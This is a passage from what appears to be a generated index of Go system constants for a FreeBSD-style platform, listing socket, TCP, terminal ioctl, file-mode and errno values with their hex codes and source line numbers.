SIOCSLANPCP (line 1492) | SIOCSLANPCP = 0x80206999 constant SIOCSLOWAT (line 1493) | SIOCSLOWAT = 0x80047302 constant SIOCSPGRP (line 1494) | SIOCSPGRP = 0x80047308 constant SIOCSTUNFIB (line 1495) | SIOCSTUNFIB = 0x8020695f constant SOCK_CLOEXEC (line 1496) | SOCK_CLOEXEC = 0x10000000 constant SOCK_DGRAM (line 1497) | SOCK_DGRAM = 0x2 constant SOCK_MAXADDRLEN (line 1498) | SOCK_MAXADDRLEN = 0xff constant SOCK_NONBLOCK (line 1499) | SOCK_NONBLOCK = 0x20000000 constant SOCK_RAW (line 1500) | SOCK_RAW = 0x3 constant SOCK_RDM (line 1501) | SOCK_RDM = 0x4 constant SOCK_SEQPACKET (line 1502) | SOCK_SEQPACKET = 0x5 constant SOCK_STREAM (line 1503) | SOCK_STREAM = 0x1 constant SOL_LOCAL (line 1504) | SOL_LOCAL = 0x0 constant SOL_SOCKET (line 1505) | SOL_SOCKET = 0xffff constant SOMAXCONN (line 1506) | SOMAXCONN = 0x80 constant SO_ACCEPTCONN (line 1507) | SO_ACCEPTCONN = 0x2 constant SO_ACCEPTFILTER (line 1508) | SO_ACCEPTFILTER = 0x1000 constant SO_BINTIME (line 1509) | SO_BINTIME = 0x2000 constant SO_BROADCAST (line 1510) | SO_BROADCAST = 0x20 constant SO_DEBUG (line 1511) | SO_DEBUG = 0x1 constant SO_DOMAIN (line 1512) | SO_DOMAIN = 0x1019 constant SO_DONTROUTE (line 1513) | SO_DONTROUTE = 0x10 constant SO_ERROR (line 1514) | SO_ERROR = 0x1007 constant SO_KEEPALIVE (line 1515) | SO_KEEPALIVE = 0x8 constant SO_LABEL (line 1516) | SO_LABEL = 0x1009 constant SO_LINGER (line 1517) | SO_LINGER = 0x80 constant SO_LISTENINCQLEN (line 1518) | SO_LISTENINCQLEN = 0x1013 constant SO_LISTENQLEN (line 1519) | SO_LISTENQLEN = 0x1012 constant SO_LISTENQLIMIT (line 1520) | SO_LISTENQLIMIT = 0x1011 constant SO_MAX_PACING_RATE (line 1521) | SO_MAX_PACING_RATE = 0x1018 constant SO_NOSIGPIPE (line 1522) | SO_NOSIGPIPE = 0x800 constant SO_NO_DDP (line 1523) | SO_NO_DDP = 0x8000 constant SO_NO_OFFLOAD (line 1524) | SO_NO_OFFLOAD = 0x4000 constant SO_OOBINLINE (line 1525) | SO_OOBINLINE = 0x100 constant SO_PEERLABEL (line 1526) | SO_PEERLABEL = 0x1010 constant SO_PROTOCOL (line 1527) | SO_PROTOCOL = 0x1016 constant SO_PROTOTYPE (line 1528) | SO_PROTOTYPE = 0x1016 constant SO_RCVBUF (line 1529) | SO_RCVBUF = 0x1002 constant SO_RCVLOWAT (line 1530) | SO_RCVLOWAT = 0x1004 constant SO_RCVTIMEO (line 1531) | SO_RCVTIMEO = 0x1006 constant SO_RERROR (line 1532) | SO_RERROR = 0x20000 constant SO_REUSEADDR (line 1533) | SO_REUSEADDR = 0x4 constant SO_REUSEPORT (line 1534) | SO_REUSEPORT = 0x200 constant SO_REUSEPORT_LB (line 1535) | SO_REUSEPORT_LB = 0x10000 constant SO_SETFIB (line 1536) | SO_SETFIB = 0x1014 constant SO_SNDBUF (line 1537) | SO_SNDBUF = 0x1001 constant SO_SNDLOWAT (line 1538) | SO_SNDLOWAT = 0x1003 constant SO_SNDTIMEO (line 1539) | SO_SNDTIMEO = 0x1005 constant SO_TIMESTAMP (line 1540) | SO_TIMESTAMP = 0x400 constant SO_TS_BINTIME (line 1541) | SO_TS_BINTIME = 0x1 constant SO_TS_CLOCK (line 1542) | SO_TS_CLOCK = 0x1017 constant SO_TS_CLOCK_MAX (line 1543) | SO_TS_CLOCK_MAX = 0x3 constant SO_TS_DEFAULT (line 1544) | SO_TS_DEFAULT = 0x0 constant SO_TS_MONOTONIC (line 1545) | SO_TS_MONOTONIC = 0x3 constant SO_TS_REALTIME (line 1546) | SO_TS_REALTIME = 0x2 constant SO_TS_REALTIME_MICRO (line 1547) | SO_TS_REALTIME_MICRO = 0x0 constant SO_TYPE (line 1548) | SO_TYPE = 0x1008 constant SO_USELOOPBACK (line 1549) | SO_USELOOPBACK = 0x40 constant SO_USER_COOKIE (line 1550) | SO_USER_COOKIE = 0x1015 constant SO_VENDOR (line 1551) | SO_VENDOR = 0x80000000 constant S_BLKSIZE (line 1552) | S_BLKSIZE = 0x200 constant S_IEXEC (line 1553) | S_IEXEC = 0x40 constant S_IFBLK (line 1554) | S_IFBLK = 0x6000 constant S_IFCHR (line 1555) | S_IFCHR = 0x2000 constant S_IFDIR (line 1556) | S_IFDIR = 0x4000 constant S_IFIFO (line 1557) | S_IFIFO = 0x1000 constant S_IFLNK (line 1558) | S_IFLNK = 0xa000 constant S_IFMT (line 1559) | S_IFMT = 0xf000 constant S_IFREG (line 1560) | S_IFREG = 0x8000 constant S_IFSOCK (line 1561) | S_IFSOCK = 0xc000 constant S_IFWHT (line 1562) | S_IFWHT = 0xe000 constant S_IREAD (line 1563) | S_IREAD = 0x100 constant S_IRGRP (line 1564) | S_IRGRP = 0x20 constant S_IROTH (line 1565) | S_IROTH = 0x4 constant S_IRUSR (line 1566) | S_IRUSR = 0x100 constant S_IRWXG (line 1567) | S_IRWXG = 0x38 constant S_IRWXO (line 1568) | S_IRWXO = 0x7 constant S_IRWXU (line 1569) | S_IRWXU = 0x1c0 constant S_ISGID (line 1570) | S_ISGID = 0x400 constant S_ISTXT (line 1571) | S_ISTXT = 0x200 constant S_ISUID (line 1572) | S_ISUID = 0x800 constant S_ISVTX (line 1573) | S_ISVTX = 0x200 constant S_IWGRP (line 1574) | S_IWGRP = 0x10 constant S_IWOTH (line 1575) | S_IWOTH = 0x2 constant S_IWRITE (line 1576) | S_IWRITE = 0x80 constant S_IWUSR (line 1577) | S_IWUSR = 0x80 constant S_IXGRP (line 1578) | S_IXGRP = 0x8 constant S_IXOTH (line 1579) | S_IXOTH = 0x1 constant S_IXUSR (line 1580) | S_IXUSR = 0x40 constant TAB0 (line 1581) | TAB0 = 0x0 constant TAB3 (line 1582) | TAB3 = 0x4 constant TABDLY (line 1583) | TABDLY = 0x4 constant TCIFLUSH (line 1584) | TCIFLUSH = 0x1 constant TCIOFF (line 1585) | TCIOFF = 0x3 constant TCIOFLUSH (line 1586) | TCIOFLUSH = 0x3 constant TCION (line 1587) | TCION = 0x4 constant TCOFLUSH (line 1588) | TCOFLUSH = 0x2 constant TCOOFF (line 1589) | TCOOFF = 0x1 constant TCOON (line 1590) | TCOON = 0x2 constant TCPOPT_EOL (line 1591) | TCPOPT_EOL = 0x0 constant TCPOPT_FAST_OPEN (line 1592) | TCPOPT_FAST_OPEN = 0x22 constant TCPOPT_MAXSEG (line 1593) | TCPOPT_MAXSEG = 0x2 constant TCPOPT_NOP (line 1594) | TCPOPT_NOP = 0x1 constant TCPOPT_PAD (line 1595) | TCPOPT_PAD = 0x0 constant TCPOPT_SACK (line 1596) | TCPOPT_SACK = 0x5 constant TCPOPT_SACK_PERMITTED (line 1597) | TCPOPT_SACK_PERMITTED = 0x4 constant TCPOPT_SIGNATURE (line 1598) | TCPOPT_SIGNATURE = 0x13 constant TCPOPT_TIMESTAMP (line 1599) | TCPOPT_TIMESTAMP = 0x8 constant TCPOPT_WINDOW (line 1600) | TCPOPT_WINDOW = 0x3 constant TCP_BBR_ACK_COMP_ALG (line 1601) | TCP_BBR_ACK_COMP_ALG = 0x448 constant TCP_BBR_ALGORITHM (line 1602) | TCP_BBR_ALGORITHM = 0x43b constant TCP_BBR_DRAIN_INC_EXTRA (line 1603) | TCP_BBR_DRAIN_INC_EXTRA = 0x43c constant TCP_BBR_DRAIN_PG (line 1604) | TCP_BBR_DRAIN_PG = 0x42e constant TCP_BBR_EXTRA_GAIN (line 1605) | TCP_BBR_EXTRA_GAIN = 0x449 constant TCP_BBR_EXTRA_STATE (line 1606) | TCP_BBR_EXTRA_STATE = 0x453 constant TCP_BBR_FLOOR_MIN_TSO (line 1607) | TCP_BBR_FLOOR_MIN_TSO = 0x454 constant TCP_BBR_HDWR_PACE (line 1608) | TCP_BBR_HDWR_PACE = 0x451 constant TCP_BBR_HOLD_TARGET (line 1609) | TCP_BBR_HOLD_TARGET = 0x436 constant TCP_BBR_IWINTSO (line 1610) | TCP_BBR_IWINTSO = 0x42b constant TCP_BBR_LOWGAIN_FD (line 1611) | TCP_BBR_LOWGAIN_FD = 0x436 constant TCP_BBR_LOWGAIN_HALF (line 1612) | TCP_BBR_LOWGAIN_HALF = 0x435 constant TCP_BBR_LOWGAIN_THRESH (line 1613) | TCP_BBR_LOWGAIN_THRESH = 0x434 constant TCP_BBR_MAX_RTO (line 1614) | TCP_BBR_MAX_RTO = 0x439 constant TCP_BBR_MIN_RTO (line 1615) | TCP_BBR_MIN_RTO = 0x438 constant TCP_BBR_MIN_TOPACEOUT (line 1616) | TCP_BBR_MIN_TOPACEOUT = 0x455 constant TCP_BBR_ONE_RETRAN (line 1617) | TCP_BBR_ONE_RETRAN = 0x431 constant TCP_BBR_PACE_CROSS (line 1618) | TCP_BBR_PACE_CROSS = 0x442 constant TCP_BBR_PACE_DEL_TAR (line 1619) | TCP_BBR_PACE_DEL_TAR = 0x43f constant TCP_BBR_PACE_OH (line 1620) | TCP_BBR_PACE_OH = 0x435 constant TCP_BBR_PACE_PER_SEC (line 1621) | TCP_BBR_PACE_PER_SEC = 0x43e constant TCP_BBR_PACE_SEG_MAX (line 1622) | TCP_BBR_PACE_SEG_MAX = 0x440 constant TCP_BBR_PACE_SEG_MIN (line 1623) | TCP_BBR_PACE_SEG_MIN = 0x441 constant TCP_BBR_POLICER_DETECT (line 1624) | TCP_BBR_POLICER_DETECT = 0x457 constant TCP_BBR_PROBE_RTT_GAIN (line 1625) | TCP_BBR_PROBE_RTT_GAIN = 0x44d constant TCP_BBR_PROBE_RTT_INT (line 1626) | TCP_BBR_PROBE_RTT_INT = 0x430 constant TCP_BBR_PROBE_RTT_LEN (line 1627) | TCP_BBR_PROBE_RTT_LEN = 0x44e constant TCP_BBR_RACK_INIT_RATE (line 1628) | TCP_BBR_RACK_INIT_RATE = 0x458 constant TCP_BBR_RACK_RTT_USE (line 1629) | TCP_BBR_RACK_RTT_USE = 0x44a constant TCP_BBR_RECFORCE (line 1630) | TCP_BBR_RECFORCE = 0x42c constant TCP_BBR_REC_OVER_HPTS (line 1631) | TCP_BBR_REC_OVER_HPTS = 0x43a constant TCP_BBR_RETRAN_WTSO (line 1632) | TCP_BBR_RETRAN_WTSO = 0x44b constant TCP_BBR_RWND_IS_APP (line 1633) | TCP_BBR_RWND_IS_APP = 0x42f constant TCP_BBR_SEND_IWND_IN_TSO (line 1634) | TCP_BBR_SEND_IWND_IN_TSO = 0x44f constant TCP_BBR_STARTUP_EXIT_EPOCH (line 1635) | TCP_BBR_STARTUP_EXIT_EPOCH = 0x43d constant TCP_BBR_STARTUP_LOSS_EXIT (line 1636) | TCP_BBR_STARTUP_LOSS_EXIT = 0x432 constant TCP_BBR_STARTUP_PG (line 1637) | TCP_BBR_STARTUP_PG = 0x42d constant TCP_BBR_TMR_PACE_OH (line 1638) | TCP_BBR_TMR_PACE_OH = 0x448 constant TCP_BBR_TSLIMITS (line 1639) | TCP_BBR_TSLIMITS = 0x434 constant TCP_BBR_TSTMP_RAISES (line 1640) | TCP_BBR_TSTMP_RAISES = 0x456 constant TCP_BBR_UNLIMITED (line 1641) | TCP_BBR_UNLIMITED = 0x43b constant TCP_BBR_USEDEL_RATE (line 1642) | TCP_BBR_USEDEL_RATE = 0x437 constant TCP_BBR_USE_LOWGAIN (line 1643) | TCP_BBR_USE_LOWGAIN = 0x433 constant TCP_BBR_USE_RACK_CHEAT (line 1644) | TCP_BBR_USE_RACK_CHEAT = 0x450 constant TCP_BBR_USE_RACK_RR (line 1645) | TCP_BBR_USE_RACK_RR = 0x450 constant TCP_BBR_UTTER_MAX_TSO (line 1646) | TCP_BBR_UTTER_MAX_TSO = 0x452 constant TCP_CA_NAME_MAX (line 1647) | TCP_CA_NAME_MAX = 0x10 constant TCP_CCALGOOPT (line 1648) | TCP_CCALGOOPT = 0x41 constant TCP_CONGESTION (line 1649) | TCP_CONGESTION = 0x40 constant TCP_DATA_AFTER_CLOSE (line 1650) | TCP_DATA_AFTER_CLOSE = 0x44c constant TCP_DEFER_OPTIONS (line 1651) | TCP_DEFER_OPTIONS = 0x470 constant TCP_DELACK (line 1652) | TCP_DELACK = 0x48 constant TCP_FASTOPEN (line 1653) | TCP_FASTOPEN = 0x401 constant TCP_FASTOPEN_MAX_COOKIE_LEN (line 1654) | TCP_FASTOPEN_MAX_COOKIE_LEN = 0x10 constant TCP_FASTOPEN_MIN_COOKIE_LEN (line 1655) | TCP_FASTOPEN_MIN_COOKIE_LEN = 0x4 constant TCP_FASTOPEN_PSK_LEN (line 1656) | TCP_FASTOPEN_PSK_LEN = 0x10 constant TCP_FAST_RSM_HACK (line 1657) | TCP_FAST_RSM_HACK = 0x471 constant TCP_FIN_IS_RST (line 1658) | TCP_FIN_IS_RST = 0x49 constant TCP_FUNCTION_BLK (line 1659) | TCP_FUNCTION_BLK = 0x2000 constant TCP_FUNCTION_NAME_LEN_MAX (line 1660) | TCP_FUNCTION_NAME_LEN_MAX = 0x20 constant TCP_HDWR_RATE_CAP (line 1661) | TCP_HDWR_RATE_CAP = 0x46a constant TCP_HDWR_UP_ONLY (line 1662) | TCP_HDWR_UP_ONLY = 0x46c constant TCP_IDLE_REDUCE (line 1663) | TCP_IDLE_REDUCE = 0x46 constant TCP_INFO (line 1664) | TCP_INFO = 0x20 constant TCP_IWND_NB (line 1665) | TCP_IWND_NB = 0x2b constant TCP_IWND_NSEG (line 1666) | TCP_IWND_NSEG = 0x2c constant TCP_KEEPCNT (line 1667) | TCP_KEEPCNT = 0x400 constant TCP_KEEPIDLE (line 1668) | TCP_KEEPIDLE = 0x100 constant TCP_KEEPINIT (line 1669) | TCP_KEEPINIT = 0x80 constant TCP_KEEPINTVL (line 1670) | TCP_KEEPINTVL = 0x200 constant TCP_LOG (line 1671) | TCP_LOG = 0x22 constant TCP_LOGBUF (line 1672) | TCP_LOGBUF = 0x23 constant TCP_LOGDUMP (line 1673) | TCP_LOGDUMP = 0x25 constant TCP_LOGDUMPID (line 1674) | TCP_LOGDUMPID = 0x26 constant TCP_LOGID (line 1675) | TCP_LOGID = 0x24 constant TCP_LOGID_CNT (line 1676) | TCP_LOGID_CNT = 0x2e constant TCP_LOG_ID_LEN (line 1677) | TCP_LOG_ID_LEN = 0x40 constant TCP_LOG_LIMIT (line 1678) | TCP_LOG_LIMIT = 0x4a constant TCP_LOG_TAG (line 1679) | TCP_LOG_TAG = 0x2f constant TCP_MAXBURST (line 1680) | TCP_MAXBURST = 0x4 constant TCP_MAXHLEN (line 1681) | TCP_MAXHLEN = 0x3c constant TCP_MAXOLEN (line 1682) | TCP_MAXOLEN = 0x28 constant TCP_MAXPEAKRATE (line 1683) | TCP_MAXPEAKRATE = 0x45 constant TCP_MAXSEG (line 1684) | TCP_MAXSEG = 0x2 constant TCP_MAXUNACKTIME (line 1685) | TCP_MAXUNACKTIME = 0x44 constant TCP_MAXWIN (line 1686) | TCP_MAXWIN = 0xffff constant TCP_MAX_SACK (line 1687) | TCP_MAX_SACK = 0x4 constant TCP_MAX_WINSHIFT (line 1688) | TCP_MAX_WINSHIFT = 0xe constant TCP_MD5SIG (line 1689) | TCP_MD5SIG = 0x10 constant TCP_MINMSS (line 1690) | TCP_MINMSS = 0xd8 constant TCP_MSS (line 1691) | TCP_MSS = 0x218 constant TCP_NODELAY (line 1692) | TCP_NODELAY = 0x1 constant TCP_NOOPT (line 1693) | TCP_NOOPT = 0x8 constant TCP_NOPUSH (line 1694) | TCP_NOPUSH = 0x4 constant TCP_NO_PRR (line 1695) | TCP_NO_PRR = 0x462 constant TCP_PACING_RATE_CAP (line 1696) | TCP_PACING_RATE_CAP = 0x46b constant TCP_PCAP_IN (line 1697) | TCP_PCAP_IN = 0x1000 constant TCP_PCAP_OUT (line 1698) | TCP_PCAP_OUT = 0x800 constant TCP_PERF_INFO (line 1699) | TCP_PERF_INFO = 0x4e constant TCP_PROC_ACCOUNTING (line 1700) | TCP_PROC_ACCOUNTING = 0x4c constant TCP_RACK_ABC_VAL (line 1701) | TCP_RACK_ABC_VAL = 0x46d constant TCP_RACK_CHEAT_NOT_CONF_RATE (line 1702) | TCP_RACK_CHEAT_NOT_CONF_RATE = 0x459 constant TCP_RACK_DO_DETECTION (line 1703) | TCP_RACK_DO_DETECTION = 0x449 constant TCP_RACK_EARLY_RECOV (line 1704) | TCP_RACK_EARLY_RECOV = 0x423 constant TCP_RACK_EARLY_SEG (line 1705) | TCP_RACK_EARLY_SEG = 0x424 constant TCP_RACK_FORCE_MSEG (line 1706) | TCP_RACK_FORCE_MSEG = 0x45d constant TCP_RACK_GP_INCREASE (line 1707) | TCP_RACK_GP_INCREASE = 0x446 constant TCP_RACK_GP_INCREASE_CA (line 1708) | TCP_RACK_GP_INCREASE_CA = 0x45a constant TCP_RACK_GP_INCREASE_REC (line 1709) | TCP_RACK_GP_INCREASE_REC = 0x45c constant TCP_RACK_GP_INCREASE_SS (line 1710) | TCP_RACK_GP_INCREASE_SS = 0x45b constant TCP_RACK_IDLE_REDUCE_HIGH (line 1711) | TCP_RACK_IDLE_REDUCE_HIGH = 0x444 constant TCP_RACK_MBUF_QUEUE (line 1712) | TCP_RACK_MBUF_QUEUE = 0x41a constant TCP_RACK_MEASURE_CNT (line 1713) | TCP_RACK_MEASURE_CNT = 0x46f constant TCP_RACK_MIN_PACE (line 1714) | TCP_RACK_MIN_PACE = 0x445 constant TCP_RACK_MIN_PACE_SEG (line 1715) | TCP_RACK_MIN_PACE_SEG = 0x446 constant TCP_RACK_MIN_TO (line 1716) | TCP_RACK_MIN_TO = 0x422 constant TCP_RACK_NONRXT_CFG_RATE (line 1717) | TCP_RACK_NONRXT_CFG_RATE = 0x463 constant TCP_RACK_NO_PUSH_AT_MAX (line 1718) | TCP_RACK_NO_PUSH_AT_MAX = 0x466 constant TCP_RACK_PACE_ALWAYS (line 1719) | TCP_RACK_PACE_ALWAYS = 0x41f constant TCP_RACK_PACE_MAX_SEG (line 1720) | TCP_RACK_PACE_MAX_SEG = 0x41e constant TCP_RACK_PACE_RATE_CA (line 1721) | TCP_RACK_PACE_RATE_CA = 0x45e constant TCP_RACK_PACE_RATE_REC (line 1722) | TCP_RACK_PACE_RATE_REC = 0x460 constant TCP_RACK_PACE_RATE_SS (line 1723) | TCP_RACK_PACE_RATE_SS = 0x45f constant TCP_RACK_PACE_REDUCE (line 1724) | TCP_RACK_PACE_REDUCE = 0x41d constant TCP_RACK_PACE_TO_FILL (line 1725) | TCP_RACK_PACE_TO_FILL = 0x467 constant TCP_RACK_PACING_BETA (line 1726) | TCP_RACK_PACING_BETA = 0x472 constant TCP_RACK_PACING_BETA_ECN (line 1727) | TCP_RACK_PACING_BETA_ECN = 0x473 constant TCP_RACK_PKT_DELAY (line 1728) | TCP_RACK_PKT_DELAY = 0x428 constant TCP_RACK_PROFILE (line 1729) | TCP_RACK_PROFILE = 0x469 constant TCP_RACK_PROP (line 1730) | TCP_RACK_PROP = 0x41b constant TCP_RACK_PROP_RATE (line 1731) | TCP_RACK_PROP_RATE = 0x420 constant TCP_RACK_PRR_SENDALOT (line 1732) | TCP_RACK_PRR_SENDALOT = 0x421 constant TCP_RACK_REORD_FADE (line 1733) | TCP_RACK_REORD_FADE = 0x426 constant TCP_RACK_REORD_THRESH (line 1734) | TCP_RACK_REORD_THRESH = 0x425 constant TCP_RACK_RR_CONF (line 1735) | TCP_RACK_RR_CONF = 0x459 constant TCP_RACK_TIMER_SLOP (line 1736) | TCP_RACK_TIMER_SLOP = 0x474 constant TCP_RACK_TLP_INC_VAR (line 1737) | TCP_RACK_TLP_INC_VAR = 0x429 constant TCP_RACK_TLP_REDUCE (line 1738) | TCP_RACK_TLP_REDUCE = 0x41c constant TCP_RACK_TLP_THRESH (line 1739) | TCP_RACK_TLP_THRESH = 0x427 constant TCP_RACK_TLP_USE (line 1740) | TCP_RACK_TLP_USE = 0x447 constant TCP_REC_ABC_VAL (line 1741) | TCP_REC_ABC_VAL = 0x46e constant TCP_REMOTE_UDP_ENCAPS_PORT (line 1742) | TCP_REMOTE_UDP_ENCAPS_PORT = 0x47 constant TCP_REUSPORT_LB_NUMA (line 1743) | TCP_REUSPORT_LB_NUMA = 0x402 constant TCP_REUSPORT_LB_NUMA_CURDOM (line 1744) | TCP_REUSPORT_LB_NUMA_CURDOM = -0x1 constant TCP_REUSPORT_LB_NUMA_NODOM (line 1745) | TCP_REUSPORT_LB_NUMA_NODOM = -0x2 constant TCP_RXTLS_ENABLE (line 1746) | TCP_RXTLS_ENABLE = 0x29 constant TCP_RXTLS_MODE (line 1747) | TCP_RXTLS_MODE = 0x2a constant TCP_SHARED_CWND_ALLOWED (line 1748) | TCP_SHARED_CWND_ALLOWED = 0x4b constant TCP_SHARED_CWND_ENABLE (line 1749) | TCP_SHARED_CWND_ENABLE = 0x464 constant TCP_SHARED_CWND_TIME_LIMIT (line 1750) | TCP_SHARED_CWND_TIME_LIMIT = 0x468 constant TCP_STATS (line 1751) | TCP_STATS = 0x21 constant TCP_TIMELY_DYN_ADJ (line 1752) | TCP_TIMELY_DYN_ADJ = 0x465 constant TCP_TLS_MODE_IFNET (line 1753) | TCP_TLS_MODE_IFNET = 0x2 constant TCP_TLS_MODE_NONE (line 1754) | TCP_TLS_MODE_NONE = 0x0 constant TCP_TLS_MODE_SW (line 1755) | TCP_TLS_MODE_SW = 0x1 constant TCP_TLS_MODE_TOE (line 1756) | TCP_TLS_MODE_TOE = 0x3 constant TCP_TXTLS_ENABLE (line 1757) | TCP_TXTLS_ENABLE = 0x27 constant TCP_TXTLS_MODE (line 1758) | TCP_TXTLS_MODE = 0x28 constant TCP_USER_LOG (line 1759) | TCP_USER_LOG = 0x30 constant TCP_USE_CMP_ACKS (line 1760) | TCP_USE_CMP_ACKS = 0x4d constant TCP_VENDOR (line 1761) | TCP_VENDOR = 0x80000000 constant TCSAFLUSH (line 1762) | TCSAFLUSH = 0x2 constant TIMER_ABSTIME (line 1763) | TIMER_ABSTIME = 0x1 constant TIMER_RELTIME (line 1764) | TIMER_RELTIME = 0x0 constant TIOCCBRK (line 1765) | TIOCCBRK = 0x2000747a constant TIOCCDTR (line 1766) | TIOCCDTR = 0x20007478 constant TIOCCONS (line 1767) | TIOCCONS = 0x80047462 constant TIOCDRAIN (line 1768) | TIOCDRAIN = 0x2000745e constant TIOCEXCL (line 1769) | TIOCEXCL = 0x2000740d constant TIOCEXT (line 1770) | TIOCEXT = 0x80047460 constant TIOCFLUSH (line 1771) | TIOCFLUSH = 0x80047410 constant TIOCGDRAINWAIT (line 1772) | TIOCGDRAINWAIT = 0x40047456 constant TIOCGETA (line 1773) | TIOCGETA = 0x402c7413 constant TIOCGETD (line 1774) | TIOCGETD = 0x4004741a constant TIOCGPGRP (line 1775) | TIOCGPGRP = 0x40047477 constant TIOCGPTN (line 1776) | TIOCGPTN = 0x4004740f constant TIOCGSID (line 1777) | TIOCGSID = 0x40047463 constant TIOCGWINSZ (line 1778) | TIOCGWINSZ = 0x40087468 constant TIOCMBIC (line 1779) | TIOCMBIC = 0x8004746b constant TIOCMBIS (line 1780) | TIOCMBIS = 0x8004746c constant TIOCMGDTRWAIT (line 1781) | TIOCMGDTRWAIT = 0x4004745a constant TIOCMGET (line 1782) | TIOCMGET = 0x4004746a constant TIOCMSDTRWAIT (line 1783) | TIOCMSDTRWAIT = 0x8004745b constant TIOCMSET (line 1784) | TIOCMSET = 0x8004746d constant TIOCM_CAR (line 1785) | TIOCM_CAR = 0x40 constant TIOCM_CD (line 1786) | TIOCM_CD = 0x40 constant TIOCM_CTS (line 1787) | TIOCM_CTS = 0x20 constant TIOCM_DCD (line 1788) | TIOCM_DCD = 0x40 constant TIOCM_DSR (line 1789) | TIOCM_DSR = 0x100 constant TIOCM_DTR (line 1790) | TIOCM_DTR = 0x2 constant TIOCM_LE (line 1791) | TIOCM_LE = 0x1 constant TIOCM_RI (line 1792) | TIOCM_RI = 0x80 constant TIOCM_RNG (line 1793) | TIOCM_RNG = 0x80 constant TIOCM_RTS (line 1794) | TIOCM_RTS = 0x4 constant TIOCM_SR (line 1795) | TIOCM_SR = 0x10 constant TIOCM_ST (line 1796) | TIOCM_ST = 0x8 constant TIOCNOTTY (line 1797) | TIOCNOTTY = 0x20007471 constant TIOCNXCL (line 1798) | TIOCNXCL = 0x2000740e constant TIOCOUTQ (line 1799) | TIOCOUTQ = 0x40047473 constant TIOCPKT (line 1800) | TIOCPKT = 0x80047470 constant TIOCPKT_DATA (line 1801) | TIOCPKT_DATA = 0x0 constant TIOCPKT_DOSTOP (line 1802) | TIOCPKT_DOSTOP = 0x20 constant TIOCPKT_FLUSHREAD (line 1803) | TIOCPKT_FLUSHREAD = 0x1 constant TIOCPKT_FLUSHWRITE (line 1804) | TIOCPKT_FLUSHWRITE = 0x2 constant TIOCPKT_IOCTL (line 1805) | TIOCPKT_IOCTL = 0x40 constant TIOCPKT_NOSTOP (line 1806) | TIOCPKT_NOSTOP = 0x10 constant TIOCPKT_START (line 1807) | TIOCPKT_START = 0x8 constant TIOCPKT_STOP (line 1808) | TIOCPKT_STOP = 0x4 constant TIOCPTMASTER (line 1809) | TIOCPTMASTER = 0x2000741c constant TIOCSBRK (line 1810) | TIOCSBRK = 0x2000747b constant TIOCSCTTY (line 1811) | TIOCSCTTY = 0x20007461 constant TIOCSDRAINWAIT (line 1812) | TIOCSDRAINWAIT = 0x80047457 constant TIOCSDTR (line 1813) | TIOCSDTR = 0x20007479 constant TIOCSETA (line 1814) | TIOCSETA = 0x802c7414 constant TIOCSETAF (line 1815) | TIOCSETAF = 0x802c7416 constant TIOCSETAW (line 1816) | TIOCSETAW = 0x802c7415 constant TIOCSETD (line 1817) | TIOCSETD = 0x8004741b constant TIOCSIG (line 1818) | TIOCSIG = 0x2004745f constant TIOCSPGRP (line 1819) | TIOCSPGRP = 0x80047476 constant TIOCSTART (line 1820) | TIOCSTART = 0x2000746e constant TIOCSTAT (line 1821) | TIOCSTAT = 0x20007465 constant TIOCSTI (line 1822) | TIOCSTI = 0x80017472 constant TIOCSTOP (line 1823) | TIOCSTOP = 0x2000746f constant TIOCSWINSZ (line 1824) | TIOCSWINSZ = 0x80087467 constant TIOCTIMESTAMP (line 1825) | TIOCTIMESTAMP = 0x40107459 constant TIOCUCNTL (line 1826) | TIOCUCNTL = 0x80047466 constant TOSTOP (line 1827) | TOSTOP = 0x400000 constant UTIME_NOW (line 1828) | UTIME_NOW = -0x1 constant UTIME_OMIT (line 1829) | UTIME_OMIT = -0x2 constant VDISCARD (line 1830) | VDISCARD = 0xf constant VDSUSP (line 1831) | VDSUSP = 0xb constant VEOF (line 1832) | VEOF = 0x0 constant VEOL (line 1833) | VEOL = 0x1 constant VEOL2 (line 1834) | VEOL2 = 0x2 constant VERASE (line 1835) | VERASE = 0x3 constant VERASE2 (line 1836) | VERASE2 = 0x7 constant VINTR (line 1837) | VINTR = 0x8 constant VKILL (line 1838) | VKILL = 0x5 constant VLNEXT (line 1839) | VLNEXT = 0xe constant VMIN (line 1840) | VMIN = 0x10 constant VQUIT (line 1841) | VQUIT = 0x9 constant VREPRINT (line 1842) | VREPRINT = 0x6 constant VSTART (line 1843) | VSTART = 0xc constant VSTATUS (line 1844) | VSTATUS = 0x12 constant VSTOP (line 1845) | VSTOP = 0xd constant VSUSP (line 1846) | VSUSP = 0xa constant VTIME (line 1847) | VTIME = 0x11 constant VWERASE (line 1848) | VWERASE = 0x4 constant WCONTINUED (line 1849) | WCONTINUED = 0x4 constant WCOREFLAG (line 1850) | WCOREFLAG = 0x80 constant WEXITED (line 1851) | WEXITED = 0x10 constant WLINUXCLONE (line 1852) | WLINUXCLONE = 0x80000000 constant WNOHANG (line 1853) | WNOHANG = 0x1 constant WNOWAIT (line 1854) | WNOWAIT = 0x8 constant WSTOPPED (line 1855) | WSTOPPED = 0x2 constant WTRAPPED (line 1856) | WTRAPPED = 0x20 constant WUNTRACED (line 1857) | WUNTRACED = 0x2 constant E2BIG (line 1862) | E2BIG = syscall.Errno(0x7) constant EACCES (line 1863) | EACCES = syscall.Errno(0xd) constant EADDRINUSE (line 1864) | EADDRINUSE = syscall.Errno(0x30) constant EADDRNOTAVAIL (line 1865) | EADDRNOTAVAIL = syscall.Errno(0x31) constant EAFNOSUPPORT (line 1866) | EAFNOSUPPORT = syscall.Errno(0x2f) constant EAGAIN (line 1867) | EAGAIN = syscall.Errno(0x23) constant EALREADY (line 1868) | EALREADY = syscall.Errno(0x25) constant EAUTH (line 1869) | EAUTH = syscall.Errno(0x50) constant EBADF (line 1870) | EBADF = syscall.Errno(0x9) constant EBADMSG (line 1871) | EBADMSG = syscall.Errno(0x59) constant EBADRPC (line 1872) | EBADRPC = syscall.Errno(0x48) constant EBUSY (line 1873) | EBUSY = syscall.Errno(0x10) constant ECANCELED (line 1874) | ECANCELED = syscall.Errno(0x55) constant ECAPMODE (line 1875) | ECAPMODE = syscall.Errno(0x5e) constant ECHILD (line 1876) | ECHILD = syscall.Errno(0xa) constant ECONNABORTED (line 1877) | ECONNABORTED = syscall.Errno(0x35) constant ECONNREFUSED (line 1878) | ECONNREFUSED = syscall.Errno(0x3d) constant ECONNRESET (line 1879) | ECONNRESET = syscall.Errno(0x36) constant EDEADLK (line 1880) | EDEADLK = syscall.Errno(0xb) constant EDESTADDRREQ (line 1881) | EDESTADDRREQ = syscall.Errno(0x27) constant EDOM (line 1882) | EDOM = 